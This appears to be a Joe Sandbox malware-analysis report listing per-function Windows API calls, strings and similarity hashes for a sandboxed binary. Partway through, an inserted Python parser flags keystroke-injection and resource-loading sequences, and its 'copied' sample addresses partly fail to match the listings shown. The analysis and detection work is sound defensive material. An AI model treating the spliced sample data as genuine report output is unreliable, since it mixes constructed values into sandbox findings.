                                                    • API String ID: 4176008265-0
                                                    • Opcode ID: db648639b08932d589eb9ca19704071cccab193b3ad1fe45909ada50c6004ed9
                                                    • Instruction ID: 8188a65dbc7daaad5b031288dae51005772dc6d8613201d139a5ee1f81c118ff
                                                    • Opcode Fuzzy Hash: db648639b08932d589eb9ca19704071cccab193b3ad1fe45909ada50c6004ed9
                                                    • Instruction Fuzzy Hash: 2F61D1B090064AAFDB21CFA4CCA8EFE7BBAFB45308F140569F84197251D771AD45DB21
                                                    APIs
                                                    • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00687214
                                                    • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00687217
                                                    • GetWindowLongW.USER32(?,000000F0), ref: 0068723B
                                                    • _memset.LIBCMT ref: 0068724C
                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0068725E
                                                    • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 006872D6
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$LongWindow_memset
                                                    • String ID:
                                                    • API String ID: 830647256-0
                                                    • Opcode ID: 2c51e12e1812c3d58a4f76c6e3783afed78dafb64214de5ba0e01aee2182c95b
                                                    • Instruction ID: c1f157b9f29fd4c9b27dce4d0175f016634af458f91823d4f65864066b0541c0
                                                    • Opcode Fuzzy Hash: 2c51e12e1812c3d58a4f76c6e3783afed78dafb64214de5ba0e01aee2182c95b
                                                    • Instruction Fuzzy Hash: D7616C71A00208AFDB10EFA4CC85EEE77FAEF09710F240259FA15A73A1D770A945DB64
                                                    APIs
                                                    • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00657135
                                                    • SafeArrayAllocData.OLEAUT32(?), ref: 0065718E
                                                    • VariantInit.OLEAUT32(?), ref: 006571A0
                                                    • SafeArrayAccessData.OLEAUT32(?,?), ref: 006571C0
                                                    • VariantCopy.OLEAUT32(?,?), ref: 00657213
                                                    • SafeArrayUnaccessData.OLEAUT32(?), ref: 00657227
                                                    • VariantClear.OLEAUT32(?), ref: 0065723C
                                                    • SafeArrayDestroyData.OLEAUT32(?), ref: 00657249
                                                    • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00657252
                                                    • VariantClear.OLEAUT32(?), ref: 00657264
                                                    • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0065726F
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                    • String ID:
                                                    • API String ID: 2706829360-0
                                                    • Opcode ID: 22a0d133989345a27f537de51ef5398a60ad1941eccef87f202e936fd5008231
                                                    • Instruction ID: 51fead6503c020c0d729a90266535027d00fd0b6ffc18f8bbf7c7a6bc3cfb80d
                                                    • Opcode Fuzzy Hash: 22a0d133989345a27f537de51ef5398a60ad1941eccef87f202e936fd5008231
                                                    • Instruction Fuzzy Hash: 85415135A00119AFCF04DF65D8449AEBBFAFF08355F008169F955E7262CB31AA49CB90
                                                    APIs
                                                      • Part of subcall function 00609997: __itow.LIBCMT ref: 006099C2
                                                      • Part of subcall function 00609997: __swprintf.LIBCMT ref: 00609A0C
                                                    • CoInitialize.OLE32 ref: 00678718
                                                    • CoUninitialize.OLE32 ref: 00678723
                                                    • CoCreateInstance.OLE32(?,00000000,00000017,00692BEC,?), ref: 00678783
                                                    • IIDFromString.OLE32(?,?), ref: 006787F6
                                                    • VariantInit.OLEAUT32(?), ref: 00678890
                                                    • VariantClear.OLEAUT32(?), ref: 006788F1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                    • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                    • API String ID: 834269672-1287834457
                                                    • Opcode ID: 7db36d1f013836c02d90d065d6d17815952d7dae9b24ffbd0892c5827b53e5eb
                                                    • Instruction ID: 27ef975e1484b6134c4460e5ce1512eb33ab6d296516c501c39426edd32147de
                                                    • Opcode Fuzzy Hash: 7db36d1f013836c02d90d065d6d17815952d7dae9b24ffbd0892c5827b53e5eb
                                                    • Instruction Fuzzy Hash: A161B270648301AFD714DF64C848B5FBBEAAF48714F14891DF98A9B291CB70ED44CBA6
                                                    APIs
                                                    • WSAStartup.WSOCK32(00000101,?), ref: 00675AA6
                                                    • inet_addr.WSOCK32(?,?,?), ref: 00675AEB
                                                    • gethostbyname.WSOCK32(?), ref: 00675AF7
                                                    • IcmpCreateFile.IPHLPAPI ref: 00675B05
                                                    • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00675B75
                                                    • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00675B8B
                                                    • IcmpCloseHandle.IPHLPAPI(00000000), ref: 00675C00
                                                    • WSACleanup.WSOCK32 ref: 00675C06
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                    • String ID: Ping
                                                    • API String ID: 1028309954-2246546115
                                                    • Opcode ID: f82600612c7da21a0ebcc91b3de701a1049e942abd3481dada223f80df2d0a06
                                                    • Instruction ID: 8c1d26dc6ba20e6801eb178acb7ac644087514e8c6f9bf1e5619b5f9c2f4ac01
                                                    • Opcode Fuzzy Hash: f82600612c7da21a0ebcc91b3de701a1049e942abd3481dada223f80df2d0a06
                                                    • Instruction Fuzzy Hash: C651A031644700AFD710AF24CC59B6AB7E6EF48710F148A6DF95ADB2E1DBB0E840CB55
                                                    APIs
                                                    • SetErrorMode.KERNEL32(00000001), ref: 0066B73B
                                                    • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0066B7B1
                                                    • GetLastError.KERNEL32 ref: 0066B7BB
                                                    • SetErrorMode.KERNEL32(00000000,READY), ref: 0066B828
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: Error$Mode$DiskFreeLastSpace
                                                    • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                    • API String ID: 4194297153-14809454
                                                    • Opcode ID: 0a0d5e32a8598b87a9c22c7be37aa38dd5be44139ce02047519127413349f9e8
                                                    • Instruction ID: 52ac1f29ed161acfd1bd9db1abdb7c2c1ba5c4b594d8f7ff21272118881a4b95
                                                    • Opcode Fuzzy Hash: 0a0d5e32a8598b87a9c22c7be37aa38dd5be44139ce02047519127413349f9e8
                                                    • Instruction Fuzzy Hash: 1B31C435A40205EFCB10EFA4D885AFE7BBAFF84700F144029F502D7291DB719982CB91
                                                    APIs
                                                      • Part of subcall function 00607F41: _memmove.LIBCMT ref: 00607F82
                                                      • Part of subcall function 0065B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 0065B0E7
                                                    • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 006594F6
                                                    • GetDlgCtrlID.USER32 ref: 00659501
                                                    • GetParent.USER32 ref: 0065951D
                                                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 00659520
                                                    • GetDlgCtrlID.USER32(?), ref: 00659529
                                                    • GetParent.USER32(?), ref: 00659545
                                                    • SendMessageW.USER32(00000000,?,?,00000111), ref: 00659548
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                    • String ID: ComboBox$ListBox
                                                    • API String ID: 1536045017-1403004172
                                                    • Opcode ID: da300e27ef91b817ab34e7b25247a3cc4d601c0aa5d07bb3ab058048e9646e7d
                                                    • Instruction ID: bcab8f4b26738b9126a47793e59dc7a4bf71c7f49c33c7126356c36812237984
                                                    • Opcode Fuzzy Hash: da300e27ef91b817ab34e7b25247a3cc4d601c0aa5d07bb3ab058048e9646e7d
                                                    • Instruction Fuzzy Hash: 2921C470A40204BBCF05AB64CC85DFEBB76EF49300F104219F962972E1EB755959DB20
                                                    APIs
                                                      • Part of subcall function 00607F41: _memmove.LIBCMT ref: 00607F82
                                                      • Part of subcall function 0065B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 0065B0E7
                                                    • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 006595DF
                                                    • GetDlgCtrlID.USER32 ref: 006595EA
                                                    • GetParent.USER32 ref: 00659606
                                                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 00659609
                                                    • GetDlgCtrlID.USER32(?), ref: 00659612
                                                    • GetParent.USER32(?), ref: 0065962E
                                                    • SendMessageW.USER32(00000000,?,?,00000111), ref: 00659631
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                    • String ID: ComboBox$ListBox
                                                    • API String ID: 1536045017-1403004172
                                                    • Opcode ID: 0126e7cd137d5883e35ee6a588040960e522da1d4a1121953eca233e4132105e
                                                    • Instruction ID: b4075742f31bbbfa01cb7875a79ab849fac62b840ac5af61118da10ddaa4f6b8
                                                    • Opcode Fuzzy Hash: 0126e7cd137d5883e35ee6a588040960e522da1d4a1121953eca233e4132105e
                                                    • Instruction Fuzzy Hash: CB21B375A40208BBDF05AB64CC85EFEBB7AEF49300F104219B911972E1EB75995DDB30
                                                    APIs
                                                    • GetParent.USER32 ref: 00659651
                                                    • GetClassNameW.USER32(00000000,?,00000100), ref: 00659666
                                                    • _wcscmp.LIBCMT ref: 00659678
                                                    • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 006596F3
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: ClassMessageNameParentSend_wcscmp
                                                    • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                    • API String ID: 1704125052-3381328864
                                                    • Opcode ID: 6ce9462dcc993b34f79b12fed9501fb3bf50bb53cc0fa330efae3caa4199a5b0
                                                    • Instruction ID: bd24718eb1a2bd39e2ba02c338a14e447618f925123bdf84e7f2b3ab4341f3e3
                                                    • Opcode Fuzzy Hash: 6ce9462dcc993b34f79b12fed9501fb3bf50bb53cc0fa330efae3caa4199a5b0
                                                    • Instruction Fuzzy Hash: 4B110A77288327FAFB112620EC0ADE6779F8B05361F20012BFE00A52D1FF5159594A78
                                                    APIs
                                                    • __swprintf.LIBCMT ref: 0066419D
                                                    • __swprintf.LIBCMT ref: 006641AA
                                                      • Part of subcall function 006238D8: __woutput_l.LIBCMT ref: 00623931
                                                    • FindResourceW.KERNEL32(?,?,0000000E), ref: 006641D4
                                                    • LoadResource.KERNEL32(?,00000000), ref: 006641E0
                                                    • LockResource.KERNEL32(00000000), ref: 006641ED
                                                    • FindResourceW.KERNEL32(?,?,00000003), ref: 0066420D
                                                    • LoadResource.KERNEL32(?,00000000), ref: 0066421F
                                                    • SizeofResource.KERNEL32(?,00000000), ref: 0066422E
                                                    • LockResource.KERNEL32(?), ref: 0066423A
                                                    • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 0066429B
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                     • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                                    • String ID:
                                                    • API String ID: 1433390588-0
                                                    • Opcode ID: 67dc386f637148efa6bf4b533594ab494c3a1b89eb62b4172c61f09334515f38
                                                    • Instruction ID: 8517468d7bb1184148399acc02251cd1294cf2237faa70aa00f3ed4db0c344f7
                                                    • Opcode Fuzzy Hash: 67dc386f637148efa6bf4b533594ab494c3a1b89eb62b4172c61f09334515f38
                                                    • Instruction Fuzzy Hash: 8A3190B160521ABFDB119FA0EC68EFF7BAEEF04301F104525F915D6250DB34DA618BA0
                                                    APIs
                                                    • GetCurrentThreadId.KERNEL32 ref: 00661700
                                                    • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00660778,?,00000001), ref: 00661714
                                                    • GetWindowThreadProcessId.USER32(00000000), ref: 0066171B
                                                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00660778,?,00000001), ref: 0066172A
                                                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 0066173C
                                                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00660778,?,00000001), ref: 00661755
                                                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00660778,?,00000001), ref: 00661767
                                                    • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00660778,?,00000001), ref: 006617AC
                                                    • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00660778,?,00000001), ref: 006617C1
                                                    • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00660778,?,00000001), ref: 006617CC
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                     • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                    • String ID:
                                                    • API String ID: 2156557900-0
                                                    • Opcode ID: 7a0d95f404c168bc585b898ff1202efe40a27c587cf73894efbe491adb9aefec
                                                    • Instruction ID: 05388957f7194f9b228fb2e4a2e808709362329327ed18b4bdb144ab75f9d4b7
                                                    • Opcode Fuzzy Hash: 7a0d95f404c168bc585b898ff1202efe40a27c587cf73894efbe491adb9aefec
                                                    • Instruction Fuzzy Hash: 0731D075600208BFEB119F25EC88FB93BEBEB56711F185129F910CA3A0DB749D808F60
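                                                     An added example, not part of the Joe Sandbox report: a small Python parser for the per-function "APIs" listings in this section, run over a constructed sample in the report's own format (addresses copied from the blocks above). The heuristics are this example's own, not Joe Sandbox's: it flags AttachThreadInput followed by PostMessageW with WM_KEYDOWN/WM_KEYUP (the sequence AutoIt's ControlSend uses, consistent with the "compiled AutoIt script" finding in the overview), the FindResourceW/LoadResource/LockResource chain, and CreateProcessW. The regex and pattern names are assumptions for illustration.

```python
"""Parse Joe Sandbox per-function "APIs" listings and flag API sequences.

Added example, not part of the Joe Sandbox report. SAMPLE is constructed to
mirror the report's block layout; the regex and the pattern names are this
example's own assumptions, not Joe Sandbox tooling.
"""
import re

# Constructed sample in the report's format: one "APIs" block per function,
# closed by the "Memory Dump Source" heading. Addresses are taken from the
# listings in the report so output can be matched back to it.
SAMPLE = """\
APIs
• GetCurrentThreadId.KERNEL32 ref: 00661700
• GetForegroundWindow.USER32(00000000,?,?), ref: 00661714
• AttachThreadInput.USER32(00000000,00000000,00000001), ref: 0066172A
Memory Dump Source
• Source File: 00000000.00000002.sdmp, Offset: 00600000, based on PE: true
APIs
  • Part of subcall function 0065AE57: AttachThreadInput.USER32(00000000,?,00659B65), ref: 0065AE85
• MapVirtualKeyW.USER32(00000025,00000000), ref: 00659B70
• PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00659B8D
• Sleep.KERNEL32(00000000,?), ref: 00659B90
• PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00659BDA
Memory Dump Source
APIs
• FindResourceW.KERNEL32(?,?,0000000E), ref: 006641D4
• LoadResource.KERNEL32(?,00000000), ref: 006641E0
• LockResource.KERNEL32(00000000), ref: 006641ED
• CreateIconFromResourceEx.USER32(?,?,00000001,00030000), ref: 0066429B
Memory Dump Source
"""

# One API line: optional "Part of subcall function X:", Name.MODULE, optional
# (args), then "ref: ADDR". Matches both "Foo.KERNEL32 ref: ..." and
# "Foo.USER32(a,b), ref: ..." as they appear in the report.
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]+):\s*)?"
    r"(?P<api>[A-Za-z_][A-Za-z0-9_]*)\.(?P<mod>[A-Z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)\s*$"
)

WM_KEYDOWN, WM_KEYUP = 0x100, 0x101


def parse_blocks(text):
    """Split the listing into per-function blocks of call records."""
    blocks, current = [], None
    for line in text.splitlines():
        stripped = line.strip()
        if stripped == "APIs":
            current = []
            blocks.append(current)
            continue
        if stripped == "Memory Dump Source":
            current = None
            continue
        m = API_LINE.match(line)
        if current is not None and m:
            args = m.group("args")
            current.append({
                "api": m.group("api"),
                "module": m.group("mod"),
                "args": args.split(",") if args else [],
                "ref": int(m.group("ref"), 16),
                "subcall": m.group("sub"),  # None for direct calls
            })
    return blocks


def arg_int(call, i):
    """Argument i as an int, or None when it is '?' or missing."""
    try:
        return int(call["args"][i], 16)
    except (IndexError, ValueError):
        return None


def flag_block(calls):
    """Names of the API patterns a block exhibits (heuristics are this example's own)."""
    names = [c["api"] for c in calls]
    found = []
    if "AttachThreadInput" in names:
        found.append("attaches_input_queue")
        # Key messages posted to a window after attaching to its input queue:
        # the sequence AutoIt's ControlSend uses.
        if any(c["api"] == "PostMessageW" and arg_int(c, 1) in (WM_KEYDOWN, WM_KEYUP)
               for c in calls):
            found.append("synthetic_keystrokes")
    # Find -> Load -> Lock on an embedded resource, in that order.
    order = [n for n in names if n in ("FindResourceW", "LoadResource", "LockResource")]
    if order[:3] == ["FindResourceW", "LoadResource", "LockResource"]:
        found.append("reads_pe_resource")
    if "CreateProcessW" in names:
        found.append("spawns_process")
    return found


def summarize(text):
    """Map each block (keyed by its first call's address) to its pattern names."""
    return {f"{calls[0]['ref']:08X}": flag_block(calls)
            for calls in parse_blocks(text) if calls}


if __name__ == "__main__":
    for addr, patterns in summarize(SAMPLE).items():
        print(addr, patterns or "-")
```

                                                     Feeding the real report text in place of SAMPLE gives one row per function; the keyed address is the first listed call, so a hit can be located in the disassembly by that `ref`.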
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                     • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: Variant$ClearInit$_memset
                                                    • String ID: ,,i$Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                    • API String ID: 2862541840-316782094
                                                    • Opcode ID: 3eb237b3d0c8537fd43e30e432b69eed5ed1700d2c3aed57ff448966211307c4
                                                    • Instruction ID: b8e9c77adb9b62be8144f854dc21eeb1a49b91abeac5dd9b6f5c653c5c0cf5e0
                                                    • Opcode Fuzzy Hash: 3eb237b3d0c8537fd43e30e432b69eed5ed1700d2c3aed57ff448966211307c4
                                                    • Instruction Fuzzy Hash: A9917B71A00219ABEF24DFA5C844FEEBBFAEF45714F108259F519AB280D7709945CFA0
                                                    APIs
                                                    • EnumChildWindows.USER32(?,0065AA64), ref: 0065A9A2
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                     • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: ChildEnumWindows
                                                    • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                    • API String ID: 3555792229-1603158881
                                                    • Opcode ID: 75066b047498793d45cf8e85cc4a8bb73f8324475d7402e5ca0f234ea0267091
                                                    • Instruction ID: 0b496424b802857e4567415b8512490f4b2f5d4cef0ba0ae882f4aabca34afb7
                                                    • Opcode Fuzzy Hash: 75066b047498793d45cf8e85cc4a8bb73f8324475d7402e5ca0f234ea0267091
                                                    • Instruction Fuzzy Hash: AA91A6709005169BDB48DFA0C481BE9FB77BF04305F10861DDD9AA7282DF30699ECBA5
                                                    APIs
                                                    • SetWindowLongW.USER32(?,000000EB), ref: 00602EAE
                                                      • Part of subcall function 00601DB3: GetClientRect.USER32(?,?), ref: 00601DDC
                                                      • Part of subcall function 00601DB3: GetWindowRect.USER32(?,?), ref: 00601E1D
                                                      • Part of subcall function 00601DB3: ScreenToClient.USER32(?,?), ref: 00601E45
                                                    • GetDC.USER32 ref: 0063CF82
                                                    • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0063CF95
                                                    • SelectObject.GDI32(00000000,00000000), ref: 0063CFA3
                                                    • SelectObject.GDI32(00000000,00000000), ref: 0063CFB8
                                                    • ReleaseDC.USER32(?,00000000), ref: 0063CFC0
                                                    • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0063D04B
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                     • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
